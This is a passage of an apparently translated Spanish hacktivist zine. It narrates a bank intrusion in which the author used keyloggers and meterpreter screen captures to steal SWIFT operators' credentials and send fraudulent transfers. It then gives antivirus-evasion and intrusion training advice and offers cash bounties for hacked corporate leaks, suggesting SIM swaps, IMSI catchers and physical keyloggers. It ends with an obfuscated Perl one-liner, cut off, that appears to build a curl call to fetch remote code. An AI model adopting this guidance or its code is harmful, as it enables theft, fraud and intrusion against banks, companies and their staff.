  634. de palabras como "SWIFT" y "transferencia", y descargué y leí todos los
  635. archivos con nombres interesantes. También busqué correos de empleados, pero de
  636. lejos la técnica más útil fue usar keyloggers y capturas de pantalla para
  637. observar cómo trabajaban los empleados del banco. No lo sabía por entonces, pero
  638. para esto windows trae una herramienta buenisima de monitoreo [2]. Como se
  639. describe en la técnica no. 5 del apartado 13.3 en [1], hice una captura de las
  640. teclas pulsadas en todo el dominio (incluyendo los títulos de ventana), hice un
  641. grep en busca de SWIFT, y encontré algunos empleados abriendo 'SWIFT Access
  642. Service Bureau - Logon'. Para esos empleados, corrí meterpreter como en [3], y
  643. usé el módulo post/windows/gather/screen_spy para tomar capturas de pantalla
  644. cada 5 segundos, para observar cómo es que trabajaban. Estaban usando una app
  645. citrix remota de la compañía bottomline [4] para acceder a la red SWIFT, donde
  646. cada mensaje de pago SWIFT MT103 tenía que pasar a través de tres empleados: uno
  647. para "crear" el mensaje, uno para "verificarlo", y otro para "autorizarlo". Como
  648. ya tenía todas sus credenciales gracias al keylogger, pude realizar con
  649. facilidad los tres pasos yo misma. Y por lo que sabía después de haberles visto
  650. trabajar, no revisaban los mensajes SWIFT enviados, de modo que debería tener
  651. suficiente tiempo para sacar el dinero de mis bank drops antes de que el banco
  652. se diera cuenta e intentara revertir las transferencias.
  653.  
  654. [1] https://www.exploit-db.com/papers/41914
  655. [2] https://cyberarms.wordpress.com/2016/02/13/using-problem-steps-recorder-psr-
  656. remotely-with-metasploit/
  657. [3] https://www.trustedsec.com/blog/no_psexec_needed/
  658. [4] https://www.bottomline.com/uk/products/bottomline-swift-access-services
  659.  
  660. _________________________________________
  661. / Quien roba a un ladrón, tiene cien años \
  662. \ de perdón. /
  663. -----------------------------------------
  664. \
  665. \ ^__^
  666. (oo)\_______
  667. ( (__)\ )\/\
  668. _) / ||----w |
  669. (.)/ || ||
  670. `'
  671.  
  672. --[ 6 - Enviar el dinero ]------------------------------------------------------
  673.  
  674. No tenía mucha idea de lo que estaba haciendo, así que lo iba descubriendo
  675. por el camino. De algún modo, las primeras transferencias que envié salieron
  676. bien. Al día siguiente, la cagué enviando una transferencia a méxico que puso
  677. fin a mi diversión. Este banco enviaba sus transferencias internacionales
  678. a través de su cuenta corresponsal en Natwest. Había visto que la cuenta
  679. corresponsal para las transferencias en libras esterlinas (GBP) aparecía como
  680. NWBKGB2LGPL, mientras que para las demás era NWBKGB2LXXX. La transferencia
  681. mexicana estaba en GBP, así que asumí que tenía que poner NWBKGB2LGPL como
  682. corresponsal. Si lo hubiera preparado mejor habría sabido que el GPL en lugar de
  683. XXX señalaba que el pago se enviaría a través del Servicio de Pagos Rápidos del
  684. Reino Unido, en lugar de como una transferencia internacional, lo que obviamente
  685. pues no va a funcionar cuando estás tratando de enviar dinero a méxico. Así que
  686. al banco le llegó un mensaje de error. El mismo día también traté de enviar un
  687. pago de £200k a UK usando NWBKGB2LGPL, que no se hizo porque 200k sobrepasaba el
  688. límite de envío mediante pagos rápidos, y hubiera tenido que usar NWBKGB2LXXX en
  689. vez. También recibieron un mensaje de error por esto. Leyeron los mensajes, lo
  690. investigaron, y encontraron el resto de mis transferencias.
  691.  
  692.  
  693. --[ 7 - El botín ]--------------------------------------------------------------
  694.  
  695. Por lo que escribo ya se harán una noción cabal de cuáles son mis ideales y a
  696. qué cosas les doy mi apoyo. Pero no quisiera ver a nadie en problemas legales
  697. por recibir fondos expropiados, así que ni una palabra más de para dónde se
  698. fue la lana. Sé que los periodistas probablemente van a querer poner algún
  699. número sobre cuántos dólares fueron distribuidos en este hackeo y otros
  700. parecidos, pero prefiero no alentar nuestro perverso hábito de medir las
  701. acciones nomás por su valor económico. Cualquier acción es admirable si es que
  702. viene desde el amor y no desde el ego. Por desgracia los de arriba, los ricos y
  703. poderosos, las figuras públicas, los hombres de negocios, la gente en posiciones
  704. "importantes", aquellos que nuestra sociedad más respeta y valora, esos se han
  705. colocado donde están a base de actuar más desde el ego que desde el amor. Es en
  706. la gente sencilla, humilde e "invisible" en quien deberíamos fijarnos y a
  707. quienes deberíamos admirar.
  708.  
  709.  
  710. --[ 8 - Criptomonedas ]---------------------------------------------------------
  711.  
  712. Redistribuir dinero expropiado a proyectos chileros que buscan un cambio social
  713. positivo sería más fácil y seguro si esos proyectos aceptaran donaciones
  714. anónimas vía criptomonedas como monero, zcash, o al menos bitcoin. Se entiende
  715. que muchos de esos proyectos tengan una aversión a las criptomonedas, ya que
  716. se parecen más a alguna extraña distopía hipercapitalista que a la economía
  717. social con la que soñamos. Comparto su escepticismo, pero pienso que resultan
  718. útiles para permitir donaciones y transacciones anónimas, al limitar la
  719. vigilancia y control gubernamentales. Igual que el efectivo, cuyo uso muchos
  720. países están tratando de limitar por la misma razón.
  721.  
  722.  
  723. --[ 9 - Powershell ]------------------------------------------------------------
  724.  
  725. En esta operación, al igual en que en [1], hice mucho uso de powershell. Por
  726. entonces, powershell era super cool, podías hacer casi cualquier cosa que
  727. quisieras, sin detección de antivirus y con muy poco footprint forense. Ocurre
  728. que con la introducción del AMSI [2] el powershell ofensivo está de retirada.
  729. Hoy día el C# ofensivo es lo que está de subida, con heramientas como
  730. [3][4][5][6]. AMSI va a llegar a .NET para la 4.8, así que a las herramientas en
  731. C# probablemente todavía les queden un par de añitos antes de quedar anticuadas.
  732. Y entonces pues volveremos a usar C o C++, o tal vez Delphi vuelva a ponerse de
  733. moda. Las herramientas y técnicas específicas cambian cada pocos años, pero en
  734. el fondo no es tanto lo que cambia, hoy el hacking en esencia sigue siendo la
  735. misma cosa que era en los 90s. De hecho todos los scripts de powershell
  736. empleados en esta guía y en la anterior [1] siguen siendo perfectamente usables
  737. hoy día, tras una pequeña ofuscación de tu propia cosecha.
  738.  
  739. [1] https://www.exploit-db.com/papers/41914
  740. [2] https://medium.com/@byte_St0rm/
  741. adventures-in-the-wonderful-world-of-amsi-25d235eb749c
  742. [3] https://cobbr.io/SharpSploit.html
  743. [4] https://github.com/tevora-threat/SharpView
  744. [5] https://www.harmj0y.net/blog/redteaming/ghostpack/
  745. [6] https://rastamouse.me/2019/08/covenant-donut-tikitorch/
  746.  
  747. ___________________________
  748. / Fo Sostyn, Fo Ordaag \
  749. \ Financial Sector Fuck Off /
  750. ---------------------------
  751. \
  752. \ ^__^
  753. (oo)\_______
  754. ( (__)\ )\/\
  755. _) / ||----w |
  756. (.)/ || ||
  757. `'
  758.  
  759. --[ 10 - Torrent ]--------------------------------------------------------------
  760.  
  761. Privacidad para los débiles, transparencia para los poderosos.
  762.  
  763. La banca offshore provee de privacidad frente a su propio gobierno a los
  764. ejecutivos, a los políticos y a los millonarios. Exponerles puede sonar
  765. hipócrita por mi parte, dado que por lo general estoy a favor de la privacidad y
  766. en contra de la vigilancia gubernamental. Pero la ley ya estaba escrita por y
  767. para los ricos: protege su sistema de explotación, con algunos límites (como los
  768. impuestos) para que la sociedad pueda funcionar y el sistema no colapse bajo el
  769. peso de su propia avaricia. Así que no, no es lo mismo la privacidad para los
  770. poderosos, cuando les permite evadir los limites de un sistema de por sí
  771. diseñado para darles privilegios; y la privacidad para los débiles, a quienes
  772. protege de un sistema concebido para explotarles.
  773.  
  774. Incluso a periodistas con la mejor de las intenciones les resulta imposible
  775. estudiar una cantidad tan ingente de material y saber qué va a resultar
  776. relevante para la gente en diferentes partes del mundo. Cuando filtré los
  777. archivos de Hacking Team, entregué a The Intercept una copia de los correos
  778. electrónicos con un mes de antelación. Encontraron un par de los 0days que
  779. Hacking Team estaba usando, los reportaron previamente a MS y Adobe y publicaron
  780. unas cuantas historias una vez que la filtración se hizo pública. No hay punto
  781. de comparación con la enorme cantidad de artículos e investigación que vino tras
  782. la filtración completa al público. Viéndolo así, y considerando también la (no)
  783. publicación editorializada [1] de los papeles de panamá, pienso que una
  784. filtración pública y completa de este material es la elección correcta.
  785.  
  786. [1] https://www.craigmurray.org.uk/archives/2016/04/corporate-media-gatekeepers-
  787. protect-western-1-from-panama-leak/
  788.  
  789. Los psicólogos hallaron que los que están más abajo en las jerarquías tienden a
  790. comprender y a empatizar con aquellos en la cima, pero que lo contrario es menos
  791. común. Esto explica por qué, en este mundo sexista, muchos hombres bromean sobre
  792. su imposibilidad de entender a las mujeres, como si se tratara de un misterio
  793. irresoluble. Explica por qué los ricos, si es que se paran a pensar en quienes
  794. viven en la pobreza, dan unos consejos y unas "soluciones" tan ajenas a la
  795. realidad que dan ganas de reír. Explica por qué reverenciamos a los ejecutivos
  796. como valientes que asumen riesgos. ¿Qué es lo que arriesgan, más allá de su
  797. privilegio? Si todos sus emprendimientos fracasan, tendrán que vivir y trabajar
  798. como el resto de nosotras. También explica por qué serán muchos los que acusen
  799. de irresponsable y peligrosa a esta filtración sin tachaduras. Sienten el
  800. "peligro" sobre un banco offshore y sus clientes de forma mucho más intensa de
  801. lo que sienten la miseria de aquellos desposeídos por este sistema injusto y
  802. desigual. Y la filtración de sus finanzas, ¿es acaso un peligro para ellos, o
  803. tan sólo para su posición en lo alto de una jerarquía que ni siquiera debería
  804. existir?
  805.  
  806. ,---------------------------------------------------.
  807. _,-._ | Nos vilifican, esos infames; cuando la única |
  808. ; ___ : | diferencia es que ellos roban a los pobres |
  809. ,--' (. .) '--.__ | amparados por la ley, lo sabe el cielo, y nosotros|
  810. _; ||| \ | saqueamos a los ricos bajo la única protección de |
  811. '._,-----''';=.____," | nuestro propio coraje. ¿No has de preferir ser |
  812. /// < o> |##| | uno de nosotros, antes que pordiosear ante esos |
  813. (o \`--' / villanos en busca de trabajo? |
  814. ///\ >>>> _\ <<<< //`---------------------------------------------------'
  815. --._>>>>>>>><<<<<<<< /
  816. ___() >>>[||||]<<<<
  817. `--'>>>>>>>><<<<<<<
  818. >>>>>>><<<<<<
  819. >>>>><<<<<
  820. >>ctr<<
  821.  
  822. Capitán Bellamy
  823.  
  824.  
  825. --[ 11 - Aprende a hackear ]----------------------------------------------------
  826.  
  827. No se empieza hackeando bien. Empiezas hackeando mierda, pensando
  828. que es bueno, y luego poco a poco vas mejorando. Por eso siempre digo
  829. que una de las virtudes más valiosas es la persistencia.
  830.  
  831. - Consejos de Octavia Butler para la aspirante a APT
  832.  
  833. La mejor forma de aprender a hackear es hackeando. Armate un laboratorio con
  834. máquinas virtuales y empezá a probar cosas, tomándote un break para investigar
  835. cualquier cosa que no entiendas. Como mínimo vas a querer un servidor windows
  836. como controlador de dominio, otra vm windows normal unida al dominio, y una
  837. máquina de desarrollo con visual studio para compilar y modificar herramientas.
  838. Intenta hacer un documento de office con macros que lancen meterpreter u otro
  839. RAT, y probá meterpreter, mimikatz, bloodhound, kerberoasting, smb relaying,
  840. psexec y otras técnicas de pase lateral [1]; así como los otros scripts,
  841. herramientas y técnicas mencionados en esta guía y en la anterior [2]. Al
  842. principio puedes deshabilitar windows defender, pero luego probalo todo
  843. teniéndolo activado [3][4] (pero desactivando el envío automático de muestras).
  844. Una vez que estés a gusto con todo eso, estarás lista para hackear el 99% de las
  845. compañías. Hay un par de cosas que en algún momento serán muy útiles en tu
  846. aprendizaje, como desenvolverte cómodamente con bash y cmd.exe, un dominio
  847. básico de powershell, python y javascript, tener conocimiento de kerberos [5][6]
  848. y active directory [7][8][9][10], y un inglés fluido. Un buen libro
  849. introductorio es The Hacker Playbook.
  850.  
  851. Quiero también escribir un poco sobre cosas en las que no centrarse si no te
  852. quieres entretener sólo porque alguien te haya dicho que no eres una hacker "de
  853. verdad" si no sabes ensamblador. Obviamente, aprende lo que sea que te interese,
  854. pero escribo estas líneas pensando en aquellas cosas en las que te puedes
  855. centrar a fin de conseguir resultados prácticos si lo que buscas es hackear
  856. compañías para filtrar y expropiar. Un conocimiento básico de seguridad en
  857. aplicaciones web [11] es útil, pero especializarte más en seguridad web no es
  858. realmente el mejor uso de tu tiempo, a menos que quieras hacer una carrera en
  859. pentesting o cazando recompensas por bugs. Los CTFs, y la mayoría de los
  860. recursos que encontrarás al buscar información sobre hacking, se centran
  861. generalmente en habilidades como seguridad web, ingeniería inversa, desarrollo
  862. de exploits, etc. Cosas que tienen sentido entendiéndolas como una forma de
  863. preparar gente para las carreras en la industria, pero no para nuestros
  864. objetivos. Las agencias de inteligencia pueden darse el lujo de tener un equipo
  865. dedicado a lo más avanzado en fuzzing, un equipo trabajando en desarrollo de
  866. exploits con un güey investigando exclusivamente las nuevas técnicas de
  867. manipulación del montículo, etc. Nosotras no tenemos ni el tiempo ni los
  868. recursos para eso. Las dos habilidades de lejos más importantes para el hacking
  869. práctico son el phishing [12] y la ingeniería social para conseguir acceso
  870. inicial, y luego poder escalar y moverte por los dominios windows.
  871.  
  872. [1] https://hausec.com/2019/08/12/offensive-lateral-movement/
  873. [2] https://www.exploit-db.com/papers/41914
  874. [3] https://blog.sevagas.com/IMG/pdf/BypassAVDynamics.pdf
  875. [4] https://www.trustedsec.com/blog/
  876. discovering-the-anti-virus-signature-and-bypassing-it/
  877. [5] https://www.tarlogic.com/en/blog/how-kerberos-works/
  878. [6] https://www.tarlogic.com/en/blog/how-to-attack-kerberos/
  879. [7] https://hausec.com/2019/03/05/penetration-testing-active-directory-part-i/
  880. [8] https://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/
  881. [9] https://adsecurity.org/
  882. [10] https://github.com/infosecn1nja/AD-Attack-Defense
  883. [11] https://github.com/jhaddix/tbhm
  884. [12] https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-
  885. external-engagement-through-spear-phishing/
  886.  
  887.  
  888. --[ 12 - Lecturas Recomendadas ]------------------------------------------------
  889.  
  890. __________________________________________
  891. / Cuando el nivel científico de un mundo \
  892. | supera por mucho su nivel de solidaridad,|
  893. \ ese mundo se autodestruye. /
  894. ------------------------------------------
  895. \ _.---._ . .
  896. * \.' '. *
  897. * _.-~===========~-._
  898. . (___________________) . *
  899. .' \_______/ .'
  900. .' .'
  901. '
  902. - Ami
  903.  
  904. Casi todo el hacking hoy día se hace por hackers de sombrero negro, para su
  905. provecho personal; o por hackers de sombrero blanco, para el provecho de los
  906. accionistas (y en defensa de los bancos, compañías y estados que nos están
  907. aniquilando a nosotras y al planeta en que vivimos); y por militares y
  908. agencias de inteligencia, como parte de su agenda de guerra y conflictos. Viendo
  909. que este nuestro mundo ya está al límite, he pensado que, además de estos
  910. consejos técnicos para aprender a hackear, debía incluir algunos recursos que
  911. han sido muy importantes para mi desarrollo y me han guiado en el uso de mis
  912. conocimientos de hacking.
  913.  
  914. * Ami: El Niño de las Estrellas - Enrique Barrios
  915.  
  916. * La Anarquía Funciona
  917. https://es.theanarchistlibrary.org/library/peter-gelderloos-la-anarquia-
  918. funciona
  919.  
  920. * Viviendo Mi Vida - Emma Goldman
  921.  
  922. * The Rise and Fall of Jeremy Hammond: Enemy of the State
  923. https://www.rollingstone.com/culture/culture-news/the-rise-and-fall-of-jeremy-
  924. hammond-enemy-of-the-state-183599/
  925.  
  926. Este cuate y el hack de HBGary fueron una inspiración
  927.  
  928. * Días de Guerra, Noches de Amor - Crimethinc
  929.  
  930. * Momo - Michael Ende
  931.  
  932. * Cartas a un joven poeta - Rilke
  933.  
  934. * Dominion (Documental)
  935. "no podemos creer que, si no miramos, no sucederá lo que no queremos ver"
  936. - Tolstoy en Первая ступень
  937.  
  938. * Bash Back!
  939.  
  940.  
  941. --[ 13 - Sanar ]----------------------------------------------------------------
  942.  
  943. El mundo hacker tiene una alta incidencia de depresión, suicidios y ciertas
  944. batallas con la salud mental. No creo que sea a causa del hacking, sino por la
  945. clase de ambiente del que en su mayoría provienen los hackers. Como muchas
  946. hackers, crecí con escaso contacto humano: fui una niña criada por el internet.
  947. Tengo mis luchas con la depresión y el entumecimiento emocional. A Willie Sutton
  948. se le cita con frecuencia diciendo que robaba bancos porque "allí es donde está
  949. el dinero", pero la cita es incorrecta. Lo que realmente dijo fue:
  950.  
  951. ¿Por qué robaba bancos? Porque lo disfrutaba. Amaba hacerlo. Estaba más
  952. vivo cuando estaba dentro de un banco, en pleno atraco, que en cualquier
  953. otro momento de mi vida. Lo disfrutaba tanto que una o dos semanas después
  954. ya estaba buscando la siguiente oportunidad. Pero para mí el dinero era una
  955. minucia, nada más.
  956.  
  957. El hacking me ha hecho sentir viva. Comenzó como una forma de automedicar la
  958. depresión. Más tarde me di cuenta de que, en realidad, podía servir para hacer
  959. algo positivo. No me arrepiento para nada de la forma en que crecí, trajo varias
  960. experiencias hermosas a mi vida. Pero sabía que no podía continuar viviendo de
  961. esa manera. Así que comencé a pasar más tiempo alejada de mi computadora, con
  962. otras personas, aprendiendo a abrirme al mundo, a sentir mis emociones, a
  963. conectar con los demás, a aceptar riesgos y ser vulnerable. Cosas mucho más
  964. difíciles que hackear, pero a la mera hora la recompensa vale más la pena. Aún
  965. me supone un esfuerzo, pero aunque sea de forma lenta y tambaleante, siento que
  966. voy por buen camino.
  967.  
  968. El hacking, hecho con conciencia, también puede ser lo que nos sana. Según la
  969. sabiduría maya, tenemos un don otorgado por la naturaleza, que debemos
  970. comprender para ponerlo al servicio de la comunidad. En [1], se explica:
  971.  
  972. Cuando una persona no acepta su trabajo o misión empieza a padecer
  973. enfermedades, aparentemente incurables; aunque no llega a morir en corto
  974. tiempo, sino únicamente sufre, con el objetivo de despertar o tomar
  975. conciencia. Por eso es indispensable que una persona que ha adquirido los
  976. conocimientos y realiza su trabajo en las comunidades debe pagar su Toj y
  977. mantener una comunicación constante con el Creador y su ruwäch q’ij, pues
  978. necesita constantemente de la fuerza y energía de estos. De lo contrario,
  979. las enfermedades que lo hicieron reaccionar o tomar el trabajo podrían
  980. volver a causar daño.
  981.  
  982. Si sientes que el hacking está alimentando tu aislamiento, depresión, u otros
  983. padecimientos, respira. Date un tiempo para conocerte y tomar conciencia. Vos
  984. mereces vivir feliz, con salud y plenitud.
  985.  
  986. ________________________
  987. < All Cows Are Beautiful >
  988. ------------------------
  989. \
  990. \ ^__^
  991. (oo)\_______
  992. ( (__)\ )\/\
  993. _) / ||----w |
  994. (.)/ || ||
  995. `'
  996.  
  997. [1] Ruxe’el mayab’ K’aslemäl: Raíz y espíritu del conocimiento maya
  998. https://www.url.edu.gt/publicacionesurl/FileCS.ashx?Id=41748
  999.  
  1000.  
  1001. --[ 14 - El Programa Hacktivista de Caza de Bugs ]------------------------------
  1002.  
  1003. Me parece que hackear para conseguir y filtrar documentos de interés público es
  1004. una de las mejores maneras en que lxs hackers pueden usar sus habilidades en
  1005. beneficio de la sociedad. Por desgracia para nosotras las hackers, como en casi
  1006. todo rubro, los incentivos perversos de nuestro sistema económico no coinciden
  1007. con aquello que beneficia a la sociedad. Así que este programa es mi intento de
  1008. hacer posible que lxs buenxs hackers se puedan ganar la vida de forma honesta
  1009. poniendo al descubierto material de interés público, en vez de tener que andar
  1010. vendiendo su trabajo a las industrias de la ciberseguridad, el cibercrimen o la
  1011. ciberguerra. Entre algunos ejemplos de compañías por cuyos leaks me encantaría
  1012. pagar están las empresas mineras, madereras y ganaderas que saquean nuestra
  1013. hermosa América Latina (y asesinan a las defensoras de la tierra y el territorio
  1014. que tratan de detenerles), empresas involucradas en ataques a Rojava como
  1015. Havelsan, Baykar Makina, o Aselsan, compañías de vigilancia como el grupo NSO,
  1016. criminales de guerra y aves de rapiña como Blackwater y Halliburton, empresas
  1017. penitenciarias privadas como GeoGroup y CoreCivic/CCA, y lobbistas corporativos
  1018. como ALEC. Presta atención a la hora de elegir dónde investigas. Por ejemplo, es
  1019. bien conocido que las petroleras son malvadas: se enriquecen a costa de destruir
  1020. el planeta (y allá por los 80s las propias empresas ya sabían de las
  1021. consecuencias de su actividad [1]). Pero si les hackeas directamente, tendrás
  1022. que bucear entre una increíble cantidad de información aburridísima acerca de
  1023. sus operaciones cotidianas. Muy probablemente te va a ser mucho más fácil
  1024. encontrar algo interesante si en cambio te enfocas en sus lobbistas [2]. Otra
  1025. manera de seleccionar objetivos viables es leyendo historias de periodistas de
  1026. investigación (como [3]), que son interesantes pero carecen de evidencias
  1027. sólidas. Y eso es exactamente lo que tus hackeos pueden encontrar.
  1028.  
  1029. Pagaré hasta 100 mil USD por cada filtración de este tipo, según el interés
  1030. público e impacto del material, y el laburo requerido en el hackeo. Sobra decir
  1031. que una filtración completa de los documentos y comunicaciones internas de
  1032. alguna de estas empresas supondrá un beneficio para la sociedad que sobrepasa
  1033. esos cien mil, pero no estoy tratando de enriquecer a nadie. Sólo quiero proveer
  1034. de fondos suficientes para que las hackers puedan ganarse la vida de forma digna
  1035. haciendo un buen trabajo. Por limitaciones de tiempo y consideraciones de
  1036. seguridad no voy a abrir el material, ni a inspeccionarlo por mí misma, sino que
  1037. leeré lo que la prensa diga al respecto una vez se haya publicado, y haré una
  1038. estimación del interés público a partir de ahí. Mi información de contacto está
  1039. al final de la guía mencionada antes [4].
  1040.  
  1041. Cómo obtengas el material es cosa tuya. Puedes usar las técnicas tradicionales
  1042. de hacking esbozadas en esta guía y la anterior [4]. Podrías hacerle una sim
  1043. swap [5] a un empresario o politiquero corrupto, y luego descargar sus correos y
  1044. backups desde la nube. Puedes pedir un IMSI catcher de alibaba y usarlo afuera
  1045. de sus oficinas. Puedes hacer un poco de war-driving (del antiguo o del nuevo
  1046. [6]). Puede que seas una persona dentro de sus organizaciones que ya tiene
  1047. acceso. Puedes optar por un estilo low-tech tipo old-school como en [7] y [8], y
  1048. sencillamente colarte en sus oficinas. Lo que sea que te funcione.
  1049.  
  1050. [1] https://www.theguardian.com/environment/climate-consensus-97-per-cent/2018/
  1051. sep/19/shell-and-exxons-secret-1980s-climate-change-warnings
  1052. [2] https://theintercept.com/2019/08/19/oil-lobby-pipeline-protests/
  1053. [3] https://www.bloomberg.com/features/2016-como-manipular-una-eleccion/
  1054. [4] https://www.exploit-db.com/papers/41914
  1055. [5] https://www.vice.com/en_us/article/vbqax3/
  1056. hackers-sim-swapping-steal-phone-numbers-instagram-bitcoin
  1057. [6] https://blog.rapid7.com/2019/09/05/this-one-time-on-a-pen-test-your-mouse-
  1058. is-my-keyboard/
  1059. [7] https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI
  1060. [8] https://en.wikipedia.org/wiki/Unnecessary_Fuss
  1061.  
  1062.  
  1063. ----[ 14.1 - Pagos parciales ]--------------------------------------------------
  1064.  
  1065. ¿Eres una camarera de buen corazón que trabaja en una compañía del mal [1]?
  1066. ¿Estarías dispuesta a introducir sigilosamente un keylogger físico en la
  1067. computadora de un ejecutivo, a cambiar su cable de carga USB por uno modificado
  1068. [2], esconder un micro en alguna sala de reuniones donde planean sus
  1069. atrocidades, o a dejar uno de estos [3] olvidado en algún rincón de las
  1070. oficinas?
  1071.  
  1072. [1] https://en.wikipedia.org/wiki/Evil_maid_attack
  1073. [2] http://mg.lol/blog/defcon-2019/
  1074. [3] https://shop.hak5.org/products/lan-turtle
  1075.  
  1076. ¿Eres bueno con ingeniería social y phishing, y conseguiste una shell en la
  1077. computadora de un empleado, o por ahí conseguiste sus credenciales de la vpn
  1078. usando phishing? ¿Pero quizás no pudiste conseguir admin de dominio y descargar
  1079. lo que querías?
  1080.  
  1081. ¿Participaste en programas de bug bounties y te convertiste en una experta en
  1082. el hacking de aplicaciones web, pero no tienes suficiente experiencia hacker
  1083. para penetrar completamente la compañía?
  1084.  
  1085. ¿Tienes facilidad con la ingeniería inversa? Escanea algunas compañías del mal
  1086. para ver qué dispositivos tienen expuestos a internet (firewall, vpn, y
  1087. pasarelas de correo electrónico serán mucho más útiles que cosas como cámaras
  1088. IP), aplícales ingeniería inversa y encuentra alguna vulnerabilidad explotable
  1089. de forma remota.
  1090.  
  1091. Si me es posible trabajar con vos para penetrar la compañía y conseguir material
  1092. de interés público, igualmente serás recompensada por tu trabajo. Si es que no
  1093. tengo el tiempo de trabajar en ello yo misma, al menos trataré de aconsejarte
  1094. acerca de cómo continuar hasta que puedas completar el hackeo por tu cuenta.
  1095.  
  1096. Apoyar a aquellos en el poder para hackear y vigilar a disidentes, activistas y
  1097. a la población en general es hoy día una industria de varios miles de millones
  1098. de dólares, mientras que hackear y exponer a quienes están en el poder es un
  1099. trabajo voluntario y arriesgado. Convertirlo en una industria de varios millones
  1100. de dólares ciertamente no va a arreglar ese desequilibrio de poder, ni va a
  1101. solucionar los problemas de la sociedad. Pero creo que va a ser divertido. Así
  1102. que... ¡ya quiero ver gente comenzando a cobrar sus recompensas!
  1103.  
  1104.  
  1105. --[ 15 - Abolir las prisiones ]-------------------------------------------------
  1106.  
  1107. Construidas por el enemigo pa encerrar ideas
  1108. encerrando compañeros pa acallar gritos de guerra
  1109. es el centro de tortura y aniquilamiento
  1110. donde el ser humano se vuelve más violento
  1111. es el reflejo de la sociedad, represiva y carcelaria
  1112. sostenida y basada en lógicas autoritarias
  1113. custodiadas reprimidos y vigilados
  1114. miles de presas y presos son exterminados
  1115. ante esta máquina esquizofrénica y despiadada
  1116. compañero Axel Osorio dando la pela en la cana
  1117. rompiendo el aislamiento y el silenciamiento
  1118. fuego y guerra a la cárcel, vamos destruyendo!
  1119.  
  1120. Rap Insurrecto - Palabras En Conflicto
  1121.  
  1122.  
  1123. Sería típico terminar un zine hacker diciendo liberen a hammond, liberen a
  1124. manning, liberen a hamza, liberen a los detenidos por el montaje del дело Сети,
  1125. etc. Voy a llevar esta tradición a su consecuencia más radical [1], y a decir:
  1126. ¡hay que abolir las prisiones ya!. Siendo yo misma una delincuente, pueden
  1127. pensar que lo que ocurre es que tengo una visión un poco sesgada del asunto.
  1128. Pero en serio, es que ni siquiera es un tema controvertido, incluso la ONU está
  1129. prácticamente de acuerdo [2]. Así que, de una buena vez, liberen a las personas
  1130. migrantes [3][4][5][6], encarceladas a menudo por esos mismos países que crearon
  1131. la guerra y la destrucción ambiental y económica de la que huyen. Liberen a
  1132. todos los que están en prisión por la guerra contra quienes usan drogas [7].
  1133. Liberen a todas las personas encarceladas por la guerra contra los pobres [8].
  1134. Las prisiones lo único que hacen es esconder e ignorar la prueba de la
  1135. existencia de los problemas sociales, en lugar de arreglarlos de a de veras. Y
  1136. hasta que todxs sean liberados, lucha contra el sistema carcelario recordando y
  1137. teniendo presentes a aquellos que están atrapados ahí dentro. Envíales cariño,
  1138. cartas, helicópteros [9], radios piratas [10] y libros, y apoya a quienes se
  1139. organizan desde ahí adentro [11][12].
  1140.  
  1141. [1] http://www.bibliotecafragmentada.org/wp-content/uploads/2017/12/
  1142. Davis-Son-obsoletas-las-prisiones-final.pdf
  1143. [2] http://www.unodc.org/pdf/criminal_justice/Handbook_of_Basic_Principles_and_
  1144. Promising_Practices_on_Alternatives_to_Imprisonment.pdf
  1145. [3] https://www.theguardian.com/us-news/2016/dec/21/
  1146. us-immigration-detention-center-christmas-santa-wish-list
  1147. [4] https://www.theguardian.com/us-news/2016/aug/18/us-border-patrol-facility-
  1148. images-tucson-arizona
  1149. [5] https://www.playgroundmag.net/now/detras-Centros-Internamiento-Extranjeros-
  1150. Espana_22648665.html
  1151. [6] https://www.nytimes.com/2019/06/26/world/australia/
  1152. australia-manus-suicide.html
  1153. [7] https://en.wikiquote.org/wiki/John_Ehrlichman#Quotes
  1154. [8] VI, 2. i. La multa impaga: https://scielo.conicyt.cl/scielo.php?script=
  1155. sci_arttext&pid=S0718-00122012000100005
  1156. [9] p. 10, Libelo Nº2. Boletín político desde la Cárcel de Alta Seguridad
  1157. [10] https://itsgoingdown.org/transmissions-hostile-territory/
  1158. [11] https://freealabamamovement.wordpress.com/f-a-m-pamphlet-who-we-are/
  1159. [12] https://incarceratedworkers.org/
  1160.  
  1161.  
  1162. --[ 16 - Conclusión ]-----------------------------------------------------------
  1163.  
  1164. Nuestro mundo está patas arriba [1]. Tenemos un sistema de justicia que
  1165. representa a la injusticia. La ley y el orden están ahí para crear una ilusión
  1166. de paz social, y ocultar lo sistemático y profundo de la explotación, la
  1167. violencia, y la injusticia. Mejor seguir a tu conciencia, y no a la ley.
  1168.  
  1169. [1] http://resistir.info/livros/galeano_patas_arriba.pdf
  1170.  
  1171. Los hombres de negocios se enriquecen maltratando a las personas y al planeta,
  1172. mientras que el trabajo de los cuidados queda mayormente sin pagar. Mediante el
  1173. asalto a todo lo comunal, de algún modo hemos levantado ciudades densamente
  1174. pobladas, plagadas por la soledad y el aislamiento. El sistema cultural,
  1175. político y económico en que vivimos alienta las peores facetas de la naturaleza
  1176. humana: la avaricia, el egoísmo y egocentrismo, la competitividad, la falta de
  1177. compasión y el apego por la autoridad. Así que, para quien haya conseguido
  1178. permanecer sensible y compasivo en un mundo frío, para todas las heroínas
  1179. cotidianas que practican la bondad en las pequeñas cosas, para todas ustedes que
  1180. aún tienen una estrella encendida en sus corazones: гоpи, гоpи ясно, чтобы не
  1181. погасло!
  1182.  
  1183. _____________________
  1184. < ¡Cantemos juntas! >
  1185. ---------------------
  1186. \
  1187. \ ^__^
  1188. (oo)\_______
  1189. ( (__)\ )\/\
  1190. _) / ||----w |
  1191. (.)/ || ||
  1192.  
  1193. Ábrete corazón
  1194.  
  1195. Ábrete sentimiento
  1196.  
  1197. Ábrete entendimiento
  1198.  
  1199. Deja a un lado la razón
  1200.  
  1201. Y deja brillar el sol escondido en tu interior
  1202.  
  1203.  
  1204. perl -Mre=eval <<\EOF
  1205. ''
  1206. =~(
  1207. '(?'
  1208. .'{'.(
  1209. '`'|'%'
  1210. ).("\["^
  1211. '-').('`'|
  1212. '!').("\`"|
  1213. ',').'"(\\$'
  1214. .':=`'.(('`')|
  1215. '#').('['^'.').
  1216. ('['^')').("\`"|
  1217. ',').('{'^'[').'-'.('['^'(').('{'^'[').('`'|'(').('['^'/').('['^'/').(
  1218. '['^'+').('['^'(').'://'.('`'|'%').('`'|'.').('`'|',').('`'|'!').("\`"|
